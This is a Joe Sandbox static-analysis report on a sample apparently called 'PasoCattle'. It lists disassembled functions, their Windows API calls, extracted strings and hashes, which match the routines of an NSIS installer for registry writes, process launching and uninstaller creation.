GetShortPathNameW.KERNEL32(000000F1,0046B478,00000400), ref: 00406B1E
WideCharToMultiByte.KERNEL32(00000000,00000000,00465E20,000000FF,00466620,00000400,00000000,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA), ref: 00406B47
WideCharToMultiByte.KERNEL32(00000000,00000000,0046B478,000000FF,00466C70,00000400,00000000,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA), ref: 00406B5F
wsprintfA.USER32 ref: 00406B79
GetFileSize.KERNEL32(00000000,00000000,0046B478,C0000000,00000004,0046B478,?,?,00000000,000000F1,?), ref: 00406BB1
GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00406BC0
ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406BDC
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename]), ref: 00406C0C
SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,00467070,00000000,-0000000A,0040A87C,00000000,[Rename]), ref: 00406C63

Part of subcall function 00405E7C: GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
Part of subcall function 00405E7C: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2

WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00406C77
GlobalFree.KERNEL32(00000000), ref: 00406C7E
CloseHandle.KERNEL32(?), ref: 00406C88

Strings

NUL, xrefs: 00406ACA
plF, xrefs: 00406B54
^F, xrefs: 00406ACF
[Rename], xrefs: 00406BF4, 00406C03
%s=%s, xrefs: 00406B6F

Memory Dump Source

Source File: 00000007.00000002.1298047286.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.1298005090.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298176646.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298504433.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_PasoCattle.jbxd

Similarity

API ID: File$ByteCharCloseGlobalHandleMultiNamePathShortWidelstrcpylstrlen$AllocAttributesCreateFreePointerReadSizeWritewsprintf
String ID: ^F$%s=%s$NUL$[Rename]$plF
API String ID: 565278875-3368763019
Opcode ID: 8d6a48264c4b44e6e847a38bbc5540ed6369e357cae48dbe616f47649f698452
Instruction ID: 187392fb1a539ff374a899d42f74550c270b9899c721d3c7d9f4fe98b52eb23c
Opcode Fuzzy Hash: 8d6a48264c4b44e6e847a38bbc5540ed6369e357cae48dbe616f47649f698452
Instruction Fuzzy Hash: F2414B322082197FE7206B61DD4CE6F3E6CDF4A758B12013AF586F21D1D6399C10867E

Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 127COMMON

Download Yara Rule

APIs

DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32(?,?), ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010D8
FillRect.USER32(00000000,?,00000000), ref: 004010ED
DeleteObject.GDI32(?), ref: 004010F6
CreateFontIndirectW.GDI32(?), ref: 0040110E
SetBkMode.GDI32(00000000,00000001), ref: 0040112F
SetTextColor.GDI32(00000000,000000FF), ref: 00401139
SelectObject.GDI32(00000000,?), ref: 00401149
DrawTextW.USER32(00000000,00476AA0,000000FF,00000010,00000820), ref: 0040115F
SelectObject.GDI32(00000000,00000000), ref: 00401169
DeleteObject.GDI32(?), ref: 0040116E
EndPaint.USER32(?,?), ref: 00401177

Strings

F, xrefs: 0040100C

Memory Dump Source

Source File: 00000007.00000002.1298047286.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.1298005090.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298176646.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298504433.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_PasoCattle.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F
API String ID: 941294808-1304234792
Opcode ID: 2efc14ad74cb110e0ad817299842ebea0c3d587f520aff37d9c167bf14942bce
Instruction ID: 3a901b8e11bd10f40e8c3d59bf329074d7a31f92ad936af625f7db958ebfa50f
Opcode Fuzzy Hash: 2efc14ad74cb110e0ad817299842ebea0c3d587f520aff37d9c167bf14942bce
Instruction Fuzzy Hash: BF518772800209AFCF05CF95DD459AFBBB9FF45315F00802AF952AA1A1C738EA50DFA4

Function 00402880 Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 131registrystringCOMMON

Download Yara Rule

APIs

RegCreateKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004028DA
lstrlenW.KERNEL32(004140F8,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004028FD
RegSetValueExW.ADVAPI32(?,?,?,?,004140F8,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004029BC
RegCloseKey.ADVAPI32(?), ref: 004029E4

Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3

Strings

WriteRegBin: "%s\%s" "%s"="%s", xrefs: 004029A1
WriteRegDWORD: "%s\%s" "%s"="0x%08x", xrefs: 00402959
WriteRegExpandStr: "%s\%s" "%s"="%s", xrefs: 0040292A
WriteReg: error creating key "%s\%s", xrefs: 004029F5
WriteReg: error writing into "%s\%s" "%s", xrefs: 004029D4
WriteRegStr: "%s\%s" "%s"="%s", xrefs: 00402918

Memory Dump Source

Source File: 00000007.00000002.1298047286.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.1298005090.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298176646.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298504433.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_PasoCattle.jbxd

Similarity

API ID: lstrlen$CloseCreateValuewvsprintf
String ID: WriteReg: error creating key "%s\%s"$WriteReg: error writing into "%s\%s" "%s"$WriteRegBin: "%s\%s" "%s"="%s"$WriteRegDWORD: "%s\%s" "%s"="0x%08x"$WriteRegExpandStr: "%s\%s" "%s"="%s"$WriteRegStr: "%s\%s" "%s"="%s"
API String ID: 1641139501-220328614
Opcode ID: 066b4e300930aa0920c328732a1d1fc015c018ed119ca6dd3c3d5e24db852520
Instruction ID: c6ff7831871a22410ebf281ca69ba80d881ba5d3dc99c3f31bea2db7712f227d
Opcode Fuzzy Hash: 066b4e300930aa0920c328732a1d1fc015c018ed119ca6dd3c3d5e24db852520
Instruction Fuzzy Hash: EE418BB2D00208BFCF11AF91CD46DEEBB7AEF44344F20807AF605761A2D3794A509B69

Function 00406113 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 72filestringCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,00406300,00000000), ref: 0040612A
GetFileAttributesW.KERNEL32(00476240,?,00000000,00000000,?,?,00406300,00000000), ref: 00406168
WriteFile.KERNEL32(00000000,000000FF,00000002,00000000,00000000,00476240,40000000,00000004), ref: 004061A1
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,00476240,40000000,00000004), ref: 004061AD
lstrcatW.KERNEL32(RMDir: RemoveDirectory invalid input(""),0040A678,?,00000000,00000000,?,?,00406300,00000000), ref: 004061C7
lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),?,?,00406300,00000000), ref: 004061CE
WriteFile.KERNEL32(RMDir: RemoveDirectory invalid input(""),00000000,00406300,00000000,?,?,00406300,00000000), ref: 004061E3

Strings

RMDir: RemoveDirectory invalid input(""), xrefs: 004061C1, 004061C6, 004061CD, 004061DC
@bG, xrefs: 00406162

Memory Dump Source

Source File: 00000007.00000002.1298047286.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.1298005090.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298176646.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298504433.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_PasoCattle.jbxd

Similarity

API ID: File$Write$AttributesCloseHandlePointerlstrcatlstrlen
String ID: @bG$RMDir: RemoveDirectory invalid input("")
API String ID: 3734993849-3206598305
Opcode ID: 48839086a200bf93aa32383a4ca0414da094928b154be734d4a38c22442d7c90
Instruction ID: 195d9f7db6fc7c0c2d4377fc833027156c916e626c5a885f84869a8699de3d55
Opcode Fuzzy Hash: 48839086a200bf93aa32383a4ca0414da094928b154be734d4a38c22442d7c90
Instruction Fuzzy Hash: 0121C271500240EBD710ABA8DD88D9B3B6CEB06334B118336F52ABA1E1D7389D85C7AC

Function 00402E55 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 103memoryfileCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,000000F0), ref: 00402EA9
GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,000000F0), ref: 00402EC5
GlobalFree.KERNEL32(FFFFFD66), ref: 00402EFE
WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,000000F0), ref: 00402F10
GlobalFree.KERNEL32(00000000), ref: 00402F17
CloseHandle.KERNEL32(?,?,?,?,?,000000F0), ref: 00402F2F
DeleteFileW.KERNEL32(?), ref: 00402F56

Strings

created uninstaller: %d, "%s", xrefs: 00402F3B

Memory Dump Source

Source File: 00000007.00000002.1298047286.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.1298005090.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298176646.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298504433.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_PasoCattle.jbxd

Similarity

API ID: Global$AllocFileFree$CloseDeleteHandleWrite
String ID: created uninstaller: %d, "%s"
API String ID: 3294113728-3145124454
Opcode ID: 43406d439bebe3a41a7ad8946693a81c25abcec0bebba575c0e34f0bdeff8a90
Instruction ID: bd1c3f70b2adfd396ae192ad3b35d3c6df9fc0ba6a3ee2c413e2f7d1cf6bca0f
Opcode Fuzzy Hash: 43406d439bebe3a41a7ad8946693a81c25abcec0bebba575c0e34f0bdeff8a90
Instruction Fuzzy Hash: CF319E72800115ABDB11AFA9CD89DAF7FB9EF08364F10023AF515B61E1C7394E419B98

Function 004023F0 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 83libraryCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 0040241C

Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,0042A4AD,771B23A0,00000000), ref: 00404FD6
Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,0042A4AD,771B23A0,00000000), ref: 00404FE6
Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,0042A4AD,771B23A0,00000000), ref: 00404FF9
Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059

Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3

LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040242D
FreeLibrary.KERNEL32(?,?), ref: 004024C3

Strings

Error registering DLL: Could not initialize OLE, xrefs: 004024F1
Error registering DLL: %s not found in %s, xrefs: 0040249A
`G, xrefs: 0040246E
Error registering DLL: Could not load %s, xrefs: 004024DB

Memory Dump Source

Source File: 00000007.00000002.1298047286.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.1298005090.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298176646.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298504433.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_PasoCattle.jbxd

Similarity

API ID: MessageSendlstrlen$Library$FreeHandleLoadModuleTextWindowlstrcatwvsprintf
String ID: Error registering DLL: %s not found in %s$Error registering DLL: Could not initialize OLE$Error registering DLL: Could not load %s$`G
API String ID: 1033533793-4193110038
Opcode ID: dfa9fb55bab39987c49c05a208fb72d841c7d3de21fe9f712437cd20c315518e
Instruction ID: ac94b2829880799def153f2ab6d9fb01897d962df66ba524602deb4d09d833fb
Opcode Fuzzy Hash: dfa9fb55bab39987c49c05a208fb72d841c7d3de21fe9f712437cd20c315518e
Instruction Fuzzy Hash: AE21A635A00215FBDF20AFA1CE49A9D7E71AB44318F30817BF512761E1D6BD4A80DA5D

Function 00403DF6 Relevance: 12.1, APIs: 8, Instructions: 60COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EB), ref: 00403E10
GetSysColor.USER32(00000000), ref: 00403E2C
SetTextColor.GDI32(?,00000000), ref: 00403E38
SetBkMode.GDI32(?,?), ref: 00403E44
GetSysColor.USER32(?), ref: 00403E57
SetBkColor.GDI32(?,?), ref: 00403E67
DeleteObject.GDI32(?), ref: 00403E81
CreateBrushIndirect.GDI32(?), ref: 00403E8B

Memory Dump Source

Source File: 00000007.00000002.1298047286.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.1298005090.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298176646.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298504433.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_PasoCattle.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: 2cd1843f4009558aed8999710a19f2fd839bd0fd7577925b5fb66d8747ca327a
Instruction ID: 46e75ec11a9703e62b9e59528547c83071966f0b6f932d53464b5ad1ffaeee7a
Opcode Fuzzy Hash: 2cd1843f4009558aed8999710a19f2fd839bd0fd7577925b5fb66d8747ca327a
Instruction Fuzzy Hash: CA116371500744ABCB219F78DD08B5BBFF8AF40715F048A2AE895E22A1D738DA44CB94

Function 00402238 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59synchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3

Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,0042A4AD,771B23A0,00000000), ref: 00404FD6
Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,0042A4AD,771B23A0,00000000), ref: 00404FE6
Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,0042A4AD,771B23A0,00000000), ref: 00404FF9
Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059

Part of subcall function 00405C6B: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00461DD0,Error launching installer), ref: 00405C90
Part of subcall function 00405C6B: CloseHandle.KERNEL32(?), ref: 00405C9D

WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00402288
GetExitCodeProcess.KERNEL32(?,?), ref: 00402298
CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00402AF2

Strings

Exec: failed createprocess ("%s"), xrefs: 004022C2
Exec: success ("%s"), xrefs: 00402263
Exec: command="%s", xrefs: 00402241

Memory Dump Source

Source File: 00000007.00000002.1298047286.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.1298005090.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298176646.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298504433.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_PasoCattle.jbxd

Similarity

API ID: MessageSendlstrlen$CloseHandleProcess$CodeCreateExitObjectSingleTextWaitWindowlstrcatwvsprintf
String ID: Exec: command="%s"$Exec: failed createprocess ("%s")$Exec: success ("%s")
API String ID: 2014279497-3433828417
Opcode ID: 6019f50a09c3a98591d7ac19e214774b8a762e16cd0fcb62cdb4911ff5dda7cf
Instruction ID: 042007ee205ef60e30064d08c60082207347e2967af2fac5581f577c4c1081ae
Opcode Fuzzy Hash: 6019f50a09c3a98591d7ac19e214774b8a762e16cd0fcb62cdb4911ff5dda7cf
Instruction Fuzzy Hash: 4E11A332504115EBDB01BFE1DE49AAE3A62EF04324B24807FF502B51D2C7BD4D51DA9D

Function 0040487A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404895
GetMessagePos.USER32 ref: 0040489D
ScreenToClient.USER32(?,?), ref: 004048B5
SendMessageW.USER32(?,00001111,00000000,?), ref: 004048C7
SendMessageW.USER32(?,0000113E,00000000,?), ref: 004048ED

Strings

f, xrefs: 004048C9

Memory Dump Source

Source File: 00000007.00000002.1298047286.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.1298005090.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298176646.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298504433.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_PasoCattle.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: dd0771fa492b48a0b3c5816c4430d79e7bf8162a268c2264a59d8032563336e2
Instruction ID: ebefa7930bdcd0e41c689069c6d494cf412fee4c497549fa98469d3d4217857c
Opcode Fuzzy Hash: dd0771fa492b48a0b3c5816c4430d79e7bf8162a268c2264a59d8032563336e2
Instruction Fuzzy Hash: 7A019E72A00219BAEB00DB94CC85BEEBBB8AF44710F10412ABB10B61D0C3B45A058BA4

Function 0040324C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 0040326A
MulDiv.KERNEL32(00012C00,00000064,00103847), ref: 00403295
wsprintfW.USER32 ref: 004032A5
SetWindowTextW.USER32(?,?), ref: 004032B5
SetDlgItemTextW.USER32(?,00000406,?), ref: 004032C7

Strings

verifying installer: %d%%, xrefs: 0040329F

Memory Dump Source

Source File: 00000007.00000002.1298047286.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.1298005090.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298176646.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298504433.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_PasoCattle.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: verifying installer: %d%%
API String ID: 1451636040-82062127
Opcode ID: 3861699fe6b90eb98aefdbb76a6aac10e2c6ef9ed100297db3f2db1cf1739afe
Instruction ID: b5f4dff99bd495ec87a9693a0662ffae913500554fa258d9a040327637eece45
Opcode Fuzzy Hash: 3861699fe6b90eb98aefdbb76a6aac10e2c6ef9ed100297db3f2db1cf1739afe
Instruction Fuzzy Hash: F8014470640109BBEF109F60DC4AFEE3B68AB00309F008439FA05E51E1DB789A55CF58

Function 00406064 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71COMMON

Download Yara Rule

APIs

CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
CharNextW.USER32(?,?,?,00000000), ref: 004060D6
CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF

Strings

*?|<>/":, xrefs: 004060B6

Memory Dump Source

Source File: 00000007.00000002.1298047286.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.1298005090.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298176646.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298504433.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_PasoCattle.jbxd

Similarity

API ID: Char$Next$Prev
String ID: *?|<>/":
API String ID: 589700163-165019052
Opcode ID: 45da571b5baffeb551c3f596f843ba1ccba930a874212f5238eaf5e1151c3a30
